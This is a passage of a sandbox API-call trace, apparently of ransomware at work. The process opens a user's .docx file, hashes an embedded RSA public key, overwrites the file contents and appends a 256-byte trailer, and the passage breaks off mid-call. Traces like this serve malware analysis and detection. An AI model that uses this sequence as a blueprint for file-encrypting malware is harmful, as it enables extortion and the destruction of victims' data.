hHeap=0x2c0000) returned 1 [0189.105] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f52b60, ftCreationTime.dwHighDateTime=0x1d83c36, ftLastAccessTime.dwLowDateTime=0x97580400, ftLastAccessTime.dwHighDateTime=0x1d892ea, ftLastWriteTime.dwLowDateTime=0x97580400, ftLastWriteTime.dwHighDateTime=0x1d892ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kLC6o4xsmRx_iA iEAy2.docx", cAlternateFileName="KLC6O4~1.DOC")) returned 1 [0189.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a88 [0189.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0189.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2a88 | out: hHeap=0x2c0000) returned 1 [0189.105] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\kLC6o4xsmRx_iA iEAy2.docx") returned=".docx" [0189.105] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\kLC6o4xsmRx_iA iEAy2.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\klc6o4xsmrx_ia ieay2.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.106] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=7309) returned 1 [0189.106] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.110] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1c67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.110] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.113] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.113] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1c8d, lpOverlapped=0x0) returned 1 [0189.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.114] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.115] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.115] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.115] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.115] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.115] GetLastError () returned 0x0 [0189.115] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.115] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.116] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.116] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.116] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c90) returned 0x2af1f88 [0189.116] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a88 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2ad0 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.117] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3c20 [0189.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c20 | out: hHeap=0x2c0000) returned 1 [0189.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daa8 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0da90 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.121] GetCurrentThreadId () returned 0x5d8 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae40f8 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.121] GetCurrentThreadId () returned 0x5d8 [0189.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daa8 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db08 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db20 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dac0 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da90 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3c20 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3e30 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af4048 [0189.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3e30 | out: hHeap=0x2c0000) returned 1 [0189.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4048 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2ad0 | out: hHeap=0x2c0000) returned 1 [0189.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c20 | out: hHeap=0x2c0000) returned 1 [0189.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.133] WriteFile (in: hFile=0x584, lpBuffer=0x2af1f88*, nNumberOfBytesToWrite=0x1c88, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af1f88*, lpNumberOfBytesWritten=0x2f9fb14*=0x1c88, lpOverlapped=0x0) returned 1 [0189.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.134] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1c8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.134] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, 